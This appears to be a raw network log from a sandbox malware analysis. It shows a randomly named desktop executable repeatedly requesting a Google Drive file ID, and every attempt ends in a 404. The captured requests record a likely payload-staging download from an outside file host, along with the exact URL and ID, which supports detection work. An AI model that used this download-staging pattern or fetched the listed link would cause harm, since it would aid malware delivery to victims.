                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: script-src 'nonce-fw53fAioKHuPTZBdtCGS_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49747 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:32:08 UTC | 258 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
2025-01-10 14:32:08 UTC | 2218 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFIdbgQRxjkIGfA5tlLHI4sB_wrr9_aJ4a90vwOxRb3-tTucYZXp2uBX902t0BkusxBLWsjI
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:08 GMT
                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-aA_ZR0f0BCBgdPSoN7LX8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Set-Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU; expires=Sat, 12-Jul-2025 14:32:08 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
2025-01-10 14:32:08 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sDPCX2hNh9T_TAnUdF7mqg">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 49748 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:32:19 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
2025-01-10 14:32:19 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:19 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-yHZRtYMUPF1PsRO_R45pKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.20 | 49749 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:32:19 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
2025-01-10 14:32:19 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC6nQVZzX7OjgneRLkuPxLFJSj3gieiGHHX7Yx6rofX72iClNoI2EAetFIedSoc1pP9J
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:19 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-QoWLUwcE8tb47_MzPxWpaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
2025-01-10 14:32:19 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="B_KHilC6OOQLhQUh2gI6OA">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.11.20 | 49750 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:32:30 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
2025-01-10 14:32:30 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:30 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-utHyYCJRjBhumjw0etxrGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          5 | 192.168.11.20 | 49751 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:32:30 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:32:31 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC5BU9c99SYDNTRGFvVENQyj46YaRcBipwEyxNsKmO8-d16nHi1RXCQmXEPmY8FKIEDt
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:31 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-IKIsCl_XsgTFIpEaBBGV0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:32:31 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TGFbc0Fr6_JfbahdbQ_iFA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          6 | 192.168.11.20 | 49752 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:32:41 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:32:41 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:41 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-IsahVzFmZJapa9lR62IyUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          7 | 192.168.11.20 | 49753 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:32:42 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:32:42 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC77vVWG8zv1oikIQqRX_5zPlkDD9ufthX9c9uPCe3w68TtvECDDF_tqj7IExgwe1FTQf6_IX_s
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:42 GMT
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-_RsSWx8ndAptCJ5WgTnBew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:32:42 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mIr1trX94lRH0qZJ-kDQBg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          8 | 192.168.11.20 | 49754 | 142.250.190.110 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:32:52 UTC | 417 | OUT | GET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:32:53 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:52 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: script-src 'nonce-gudzIBQxhe73f-K1dXUa9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          9 | 192.168.11.20 | 49755 | 142.250.190.97 | 443 | 8016 | C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2025-01-10 14:32:53 UTC | 459 | OUT | GET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
